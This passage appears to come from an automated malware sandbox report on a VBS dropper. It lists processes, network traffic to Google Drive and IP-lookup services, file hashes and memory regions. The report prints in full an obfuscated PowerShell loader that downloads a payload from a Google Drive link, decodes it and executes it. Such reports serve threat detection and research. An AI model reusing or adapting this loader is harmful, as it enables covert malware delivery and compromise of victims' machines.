IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.169.33:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
GB 172.217.169.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 ba9563f04617a88e57e8c5570fafa1f6
SHA1 16ccd5c12c2e93fccb354bf4655f624748cbc1f1
SHA256 273e078cfaa142cddf150b1bfc6787fb1db78532c0ab65e1a07b28c6e939c51b
SHA512 e86be586b76800ee0439d496a8529198048d14a5d57134c9569364e4022d9639214ec9f53ba8f7ae1a0c558a65b2539d116c205e7ffb1a5dedbb9b8c0cc5965e

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 dd21f671dea68ac7cd8bf939d4eeda94
SHA1 60680c11f047dfd1f31b6121b98e8acdcc886e6b
SHA256 408a0fe12e992004153e1a9b7aac32c4e66d9b4841019fcbfb18a8674d709467
SHA512 e23eeb6927dcf233cb0159d6796c7f793a0de7169cb6ab421610f55d902aca9ab172ff905f61404a54f5d3ef2a97d99562486f9384db592cdf2113b09b4c02e7

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 453dc4b9303e5d379ce631ececb64171
SHA1 56e8d3f33a7f615a663b52d6decb6f0137668e52
SHA256 f1c454f72f9ffdb3448a33937ae1f08624a993614e083a4ef0b2e4c936176bb6
SHA512 1618026075c1ffa78280a91fdd713ea82d553bf29d07bb872db7552799d938855fd3d9090cc27497d7e8cd208f3c05b7e9134f754f330e51b63f417049c68717

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 42f4cdaff599bf751294f7772ef38470
SHA1 22d0b54450fb80f14860ffa415c5d0b2d1074a3b
SHA256 2a8488b7b6eb1ce9702c196531a0335c9b399960f5d0d3f6892f87ef6d3f743a
SHA512 45edd484ada632eba0d48a716a591d975f9ad6d414faa6a996e09f810d06a5234d2dcd28ff49e3b8e96133e815f86e681f66b66cdb648461f8ce6a53b056a74c

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 ea02db7340e3f6e6b8e17308b6557be3
SHA1 4dded0ce59ba5daea1945ed6c818139aaf87478d
SHA256 7dce804a8697a14a7a3f373b752d8c27cfae9f594620cfb5b67a362d5f227a33
SHA512 45a1658ad9fb86ca758d384a875886bee1ffa77109a71a99db4f33198d53374c75f1093549d9b55c5f6830f04657a6ff2af1519ddadff6511298acced105f683

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 a0ffdcd45250b56ef7b6ece47dfaa18f
SHA1 af5079167ca7e43f73a3a65524016e12bd10b74e
SHA256 c72d2de94bcaf6f0b0413ea1457702e325285db25a33ad9e7a6c964fedc8cf43
SHA512 40d8db37fd09f130d8defa2f904b9521cd85b5f565ecbf9639c4f54d33f2fc5c5a8aea41e30a792837da60a3c224935c704c3b9daa441d0f47a798c443a038ec

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 2ac0d2e4dc51e1a2fac93883f392047d
SHA1 4b602734b7f0e8736f1687005362013ecf6adb7f
SHA256 d8aa74f29b5249196b19533d26963b3c5720f984c789ba88fa0ea7c84d4c1191
SHA512 02b0e47673ca66dba9c531108c91c1747e788e49140b9bc0f5a90635e4c2276a75a2b2ff35ad54f0bb34220f7233f2c1606e9f6e8b0c282e14201c4536a39ba3

memory/2828-367-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

memory/2828-368-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

memory/2828-369-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/2828-370-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-371-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-372-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-373-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-374-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOG5NM3CAAAEVL24Q1J8.temp

MD5 0f92386785a13628a4071822314c0366
SHA1 4229682fd835d285140f6419b04d525a86a1a285
SHA256 ae7af3d0069215db6c9d485bb711a90b06e5eea059573ebf8ad2b0cd4f3ad572
SHA512 ac86a52cf97c21df9ae1f116cc15380ed40a572ea60dc8979ca6d09f3b49f70fdd898ae60a3f2abe6f9815fd9060f30abd79ec788418edb76cfdf46e15511bf6

C:\Users\Admin\AppData\Roaming\Cystenchyme.aan

MD5 a6606652ec2653f860af183b8aac3058
SHA1 bb291794a1893882657aea82cd6d92582e2b2a6c
SHA256 9988a534348a5f6a8082601a2506633a7394aeb9fcb7d571c458f28f603bd3ed
SHA512 eaae2e736f6fc10cfff0a5756a287c689e62f906c3190ecf21d99702469aa2aa635ae28c42ea180d6f5e5cb64fe4d3112045fcf3bb519e31d3c80b60aaf1d824

memory/2828-380-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

memory/2828-381-0x000007FEF605E000-0x000007FEF605F000-memory.dmp

memory/2756-382-0x00000000062A0000-0x000000000AF6E000-memory.dmp

memory/596-407-0x0000000000C80000-0x0000000000CC2000-memory.dmp

memory/596-406-0x0000000000C80000-0x0000000001CE2000-memory.dmp

memory/2828-408-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 09:36

Reported

2024-06-18 09:38

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp
US 8.8.8.8:53 drive.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 d91ce4da3b1a3c26df2a00c44c53bbe8
SHA1 dc2a78ace203c8f7908f80f6b4fb9f47cc174d30
SHA256 28aea483fa1a2e3c89e58b111b01dd34b52fec05e0792b757559b1de466f3eef
SHA512 cc9658970733f0896884d10887a9d836ed7a14d864e11dc27c680e88add5334336c511cda74e6a60ba3753ff9cb831e3f9cf545991b69b2c47b5485c2dada04f

C:\Users\Admin\AppData\Local\Temp\Elysee.txt

MD5 156d56579b5db937b0907bdec53b1200
SHA1 91ac0a4b3e61d03ecd75d56d61cbb5d865513aac
SHA256 ebfebe0e9db1e24b69cb3e25652b7b094c0469b49925a48666a67619d63cc544
SHA512 6ab930b6d545593fe57ffe8097f2066af9eee4b7afa6f794da0f79dfd67cd468c31806858d39bbe0491a7b8cf47120873648e211c54c07159a366443fad05a94

memory/4408-363-0x00007FF947473000-0x00007FF947475000-memory.dmp

memory/4408-364-0x00000207433B0000-0x00000207433D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14l3cqvn.2i1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-374-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-375-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-376-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-377-0x00007FF947473000-0x00007FF947475000-memory.dmp

memory/4408-378-0x00007FF947470000-0x00007FF947F31000-memory.dmp

memory/4408-379-0x00007FF947470000-0x00007FF947F31000-memory.dmp